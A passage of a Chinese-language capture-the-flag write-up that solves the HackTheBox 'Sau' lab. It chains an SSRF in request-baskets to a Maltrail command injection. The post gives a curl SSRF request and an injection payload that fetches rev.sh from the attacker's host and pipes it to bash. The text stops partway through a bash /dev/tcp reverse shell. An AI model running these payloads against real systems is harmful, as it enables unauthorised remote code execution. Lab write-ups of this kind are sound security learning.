小镇做题家——HackTheBox-Sau
PentestGPT不停地出现在我的GitHub主页流上,我看着它,像极了普通工厂工人看着自动化流水线车间。 怎么办呢?打不过就加入吧!但目前PentestGPT需要ChatGPT-4,我开不起😅 还能怎么办呢?看看演示视频吧。演示者用它来打HackTheBox,看着看着自己也手痒了。之前有注册过HackTheBox账号,但VPN实在太卡了,连最基本的网络连通性都无法保证。要想玩HackTheBox,首先得解决网络问题。 解决网络问题 一图流: 挂个代理就行。openVPN居然还能挂代理 废话不多说,开始做题! User Flag 连上VPN,先测试一下网络: ping 10.10.11.224 通!而且延迟是68ms,如果不用代理,需要680ms😁 先用nmap探测一下端口信息: nmap 10.10.11.224 -v 22端口和55555端口开放,80端口被过滤。 先看看55555端口是不是web服务: 一开始我在这个简陋的页面转了很久,把能看的地方都看了一遍,仍然没什么收获。因为它太过简陋,让我不敢相信他是一个通用型应用。 直到我换了一个浏览器打开: Chrome在干嘛??? 言归正传,Powered by request-baskets,版本是1.2.1,搜索一下它有什么漏洞。 最终我找到了request-baskets SSRF details - CodiMD,一个SSRF。 还记得远处被filtered了的80端口吗?或许可以利用SSRF看看里面究竟有什么: curl --location 'http://10.10.11.224:55555/api/baskets/fox09' --header 'Content-Type: application/json' --data '{"forward_url": "http://127.0.0.1:80/", "proxy_response": true, "insecure_tls": false, "expand_path": true, "capacity": 250}' 再访问http://10.10.11.224:55555/fox09: 嗯~得到了一个Maltrail页面,搜搜它有什么漏洞。 Unauthenticated OS Command Injection in stamparm/maltrail vulnerability found in maltrail,一个没有回显命令执行。 在经过无数失败的反弹shell后,我找到了起作用的方法: curl 'http://10.10.11.224:55555/fox09/login' --data 'username=;`curl 10.10.16.18:8000/rev.sh|bash`' 其中rev.sh的内容为: #/bin/bash bash -i >& /dev/tcp/10....